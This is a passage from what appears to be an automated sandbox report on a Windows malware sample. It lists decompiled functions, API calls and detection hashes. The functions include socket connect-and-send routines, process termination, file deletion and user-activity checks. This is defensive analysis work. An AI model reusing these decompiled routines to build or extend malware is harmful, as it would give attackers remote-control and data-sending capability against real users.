						if(_t7 != 0) {
							_t19 = _t19 - 0x10;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
							E004020C2(0x41be70, 0x5a, _t10);
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
						}
						_t7 = WaitForSingleObject( *(_t18 + 0x34), 0xffffffff);
					} while ( *((char*)(_t18 + 0x3d)) != 0);
				}
				return 1;
			}







                                        0x00405c6a
                                        0x00405c6d
                                        0x00405c77
                                        0x00405c7a
                                        0x00405c7c
                                        0x00405c84
                                        0x00405c86
                                        0x00405c90
                                        0x00405c92
                                        0x00405c98
                                        0x00405ca5
                                        0x00405cad
                                        0x00405cad
                                        0x00405cb8
                                        0x00405cbe
                                        0x00405c84
                                        0x00405cc9

                                        APIs
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,004052B3), ref: 00405C6D
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405C86
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405C98
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,0000005A), ref: 00405CAD
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405CB8
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@V01@@$??1?$basic_string@??4?$basic_string@??9std@@CreateD@2@@0@EventObjectSingleV01@V?$basic_string@Wait
                                        • String ID:
                                        • API String ID: 2456067102-0
                                        • Opcode ID: 15b4c2abc69e7f07a14bf9296a48532b590bd88ea4b7715fbce87f908c72e8fb
                                        • Instruction ID: 941b29cc010242a65ed123258a0f7c68229dc58979b588812575d9674897e9d1
                                        • Opcode Fuzzy Hash: 15b4c2abc69e7f07a14bf9296a48532b590bd88ea4b7715fbce87f908c72e8fb
                                        • Instruction Fuzzy Hash: 3BF0C875500B00BFE71017249D88AE73BADEB81321B44993EF45296AD1CB755C448F74
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412981, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00412996
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004129A8
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004129B4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004129D5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004129DE
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                                        • String ID:
                                        • API String ID: 1435062097-0
                                        • Opcode ID: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                        • Instruction ID: ff140a25c5046e2b9097d957d6cdce37f73a2c16b69e3829c68fb2596ec2fa1c
                                        • Opcode Fuzzy Hash: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                        • Instruction Fuzzy Hash: 5101847650025EEFCB009F68DC889EE7BBCFF89310F008455EC5697291D7749645CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004050FC, Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040510A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405117
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405124
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405131
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040513E
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@U?$char_traits@$D@1@@D@2@@std@@D@std@@$G@1@@G@2@@std@@G@std@@
                                        • String ID:
                                        • API String ID: 1622488342-0
                                        • Opcode ID: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                        • Instruction ID: 6e933e02768027194ec3cb2a5611c35ee588213e6c767ddfd1f1ad46262d6be2
                                        • Opcode Fuzzy Hash: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                        • Instruction Fuzzy Hash: 37F01D71504A5EDFCB14CFE4D9489DABBFCAA58249300486D9593C3500E670F20DCB20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402526, Relevance: 7.5, APIs: 5, Instructions: 34networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WS2_32(00000000,00000001,00000006), ref: 00402530
                                        • connect.WS2_32(00000000,0041B320,00000010), ref: 0040253F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041B310,?,004040BC,00000056,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00402552
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                          • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                          • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                          • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                          • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                          • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                          • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                          • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                        • closesocket.WS2_32(00000000), ref: 0040256A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,0041B320,00000010,00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 00402575
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@closesocketconnectsendsocket
                                        • String ID:
                                        • API String ID: 3330461409-0
                                        • Opcode ID: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                        • Instruction ID: d3ca73ae3b273f0ad2b6a7631a0cd8f88755cf7fea3d905b6ba3b72b83ddc57b
                                        • Opcode Fuzzy Hash: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                        • Instruction Fuzzy Hash: F4F08231A4021876DB107AA6DC0EFDE7A088F517B4F004126FD25A61D2D6B94A9086DD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D817, Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E0040D817(void* __eflags) {
				char* _t8;
				void* _t25;

				_t8 = E0040180C(_t25 - 0x10, __eflags, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				GetWindowThreadProcessId(atoi(_t8), _t25 - 0x2c);
				E004126BC( *(_t25 - 0x2c));
				E0040EBBE();
				E004017DD(_t25 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                        0x0040d820
                                        0x0040d827
                                        0x0040d836
                                        0x0040d83f
                                        0x0040e51b
                                        0x0040e6a4
                                        0x0040e6ac
                                        0x0040e6b5
                                        0x0040e6c1

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040D827
                                        • atoi.MSVCRT ref: 0040D82E
                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0040D836
                                          • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                          • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                          • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                          • Part of subcall function 0040EBBE: EnumWindows.USER32(0040EA96,00000000), ref: 0040EBD5
                                          • Part of subcall function 0040EBBE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BE60), ref: 0040EBE5
                                          • Part of subcall function 0040EBBE: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,00000063), ref: 0040EC01
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Process$??1?$basic_string@$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseEnumHandleOpenTerminateThreadV01@V01@@WindowWindowsatoi
                                        • String ID:
                                        • API String ID: 2919580351-0
                                        • Opcode ID: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                        • Instruction ID: 7c517d206c8b3613f115d3eb8ec4858c415f79e5c2237a3465432eab5c7cfc94
                                        • Opcode Fuzzy Hash: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                        • Instruction Fuzzy Hash: 88F0F872900519DFCB04ABF1EC599EDB734EB9431AB10883AE112A20E1EA785555CB2C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412100, Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412117
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041212B
                                        • ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(00416C00,6F5E5DF8), ref: 00412140
                                        • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0041214F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412158
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@FileG@1@@ModuleNameV12@
                                        • String ID:
                                        • API String ID: 758954411-0
                                        • Opcode ID: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                        • Instruction ID: 88ce2cb358dffa7750e3bac2ad7a8a5a8ee651c39e1957481fcccb9e80397935
                                        • Opcode Fuzzy Hash: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                        • Instruction Fuzzy Hash: 51F0B77554050FEFDB00DB90ED49FED7778EB54309F1080A1F506A61A0EAB0AA49CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D813, Relevance: 7.5, APIs: 5, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                        • atoi.MSVCRT ref: 0040E4B9
                                        • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                        • String ID:
                                        • API String ID: 4290155986-0
                                        • Opcode ID: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                        • Instruction ID: 20fcfc763774574552f6a97477b9112486ef0cdd22c9f36fb94fc0668df3d9e8
                                        • Opcode Fuzzy Hash: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                        • Instruction Fuzzy Hash: 05E0C932A10618CBDB04ABE1EC5DAEDB734FB94316F10883AE113A60E1EBB85555DA19
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D80A, Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                        • atoi.MSVCRT ref: 0040E4B9
                                        • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                        • String ID:
                                        • API String ID: 4290155986-0
                                        • Opcode ID: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                        • Instruction ID: f5d1e7a26b168e10bd759941827291fab992d242b1d9cf9e3ab824cccb0e0fd7
                                        • Opcode Fuzzy Hash: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                        • Instruction Fuzzy Hash: 66E0ED31910518CBDB04EBE1EC5DAEDB734FB94316F10483AE113A60E1DB785556CA18
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00406CFF, Relevance: 7.5, APIs: 5, Instructions: 25fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 25%
                                        			E00406CFF(WCHAR* __eax, void* __ecx) {
				WCHAR* _t5;
				signed int _t8;
				signed int _t9;
				void* _t15;

				_t15 = __ecx;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t5 = DeleteFileW(__eax);
				_t9 = _t8 & 0xffffff00 | _t5 != 0x00000000;
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(_t15 + 0x64, 0x415800);
				if(_t5 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					RemoveDirectoryW(_t5);
				}
				return _t9;
			}







                                        0x00406d01
                                        0x00406d06
                                        0x00406d0d
                                        0x00406d15
                                        0x00406d21
                                        0x00406d2b
                                        0x00406d2f
                                        0x00406d36
                                        0x00406d36
                                        0x00406d40

                                        APIs
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B900,00000000,00406D78), ref: 00406D06
                                        • DeleteFileW.KERNEL32(00000000), ref: 00406D0D
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041B89C,00415800), ref: 00406D21
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00406D2F
                                        • RemoveDirectoryW.KERNEL32(00000000), ref: 00406D36
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: G@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@G@2@@std@@$??9std@@DeleteDirectoryFileG@2@@0@RemoveV?$basic_string@
                                        • String ID:
                                        • API String ID: 1823182134-0
                                        • Opcode ID: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                        • Instruction ID: 37aca360b5e6e25e1cbc72d235888c1a7b4a7ee3696255f0ca1c3cc056b1b9b3
                                        • Opcode Fuzzy Hash: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                        • Instruction Fuzzy Hash: EFE04F76541E25EBCA051BA0EC0C5CE3768AE85262394803AF802A3150CB6888458B68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004050C0, Relevance: 7.5, APIs: 5, Instructions: 16COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050D0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050D9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050E2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050EB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050F4
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ??1?$basic_string@U?$char_traits@V?$allocator@$D@2@@std@@D@std@@$G@2@@std@@G@std@@
                                        • String ID:
                                        • API String ID: 1976170855-0
                                        • Opcode ID: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                        • Instruction ID: df7224a0d3b933aacf5f44a1e86bfce5252a8e6dee322f0028cbab2c50653025
                                        • Opcode Fuzzy Hash: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                        • Instruction Fuzzy Hash: D4E0B630010E0ECBC7289B10E9598EABBB0FF90B46300843EA463434B0DFB0694ACB89
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401895, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018A7
                                        • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(0041BCB0,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018B4
                                        • _CxxThrowException.MSVCRT(?,00416F28), ref: 004018C3
                                          • Part of subcall function 0040190F: ??2@YAPAXI@Z.MSVCRT ref: 0040191F
                                        Strings
                                        • invalid vector<T> subscript, xrefs: 004018A2
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@??2@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                        • String ID: invalid vector<T> subscript
                                        • API String ID: 1986322901-3016609489
                                        • Opcode ID: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                        • Instruction ID: dbd3af195aa641a4d32eff83d77deebdd7394ec7269c4e3ee2ba11d1d7788022
                                        • Opcode Fuzzy Hash: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                        • Instruction Fuzzy Hash: 0FE0E57145430EBBDF04FBE1DD46DEDB77CAB14745F100016F50062091FA75A6598769
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040500C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,00000000,0041B8D8,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040501E
                                        • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040502B
                                        • _CxxThrowException.MSVCRT(?,00416F28), ref: 0040503A
                                        Strings
                                        • invalid vector<T> subscript, xrefs: 00405019
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                        • String ID: invalid vector<T> subscript
                                        • API String ID: 3609083747-3016609489
                                        • Opcode ID: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                        • Instruction ID: 9be96ab786121cdca3df7d0b72c820f15abd94e2066078dc6746ba185848b686
                                        • Opcode Fuzzy Hash: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                        • Instruction Fuzzy Hash: ADD0127181030FFBCF00FBE0DD49CEDB77CAA04709B100015B511A3054FA74A64E8B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412019, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00412019() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x41c1dc = _t2;
				return _t2;
			}




                                        0x0041202f
                                        0x00412035
                                        0x0041203a

                                        APIs
                                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00412028
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041202F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetLastInputInfo$User32.dll
                                        • API String ID: 2574300362-1519888992
                                        • Opcode ID: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                        • Instruction ID: 4254d4a464572d01fe3095e43ecaf4df99145fa2531fe7b32d94017085124a09
                                        • Opcode Fuzzy Hash: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                        • Instruction Fuzzy Hash: F2C09B709D0650FB86011FA0AD1DBD83B15664B745721C933B902F5251CBB8D080EF1D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040F4AE, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040F4AE() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x41bf1c = _t2;
				return _t2;
			}




                                        0x0040f4c4
                                        0x0040f4ca
                                        0x0040f4cf

                                        APIs
                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040F4BD
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040F4C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: GetCursorInfo$User32.dll
                                        • API String ID: 1646373207-2714051624
                                        • Opcode ID: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                        • Instruction ID: c5b485f27e89021cea1a89f12a6954dfd40793fe5a01e249b662889bc5cfc0be
                                        • Opcode Fuzzy Hash: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                        • Instruction Fuzzy Hash: F0C04C75551600A686005FA1BC0D6D53A14A956745711C436B802B1255CB7C41459E5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

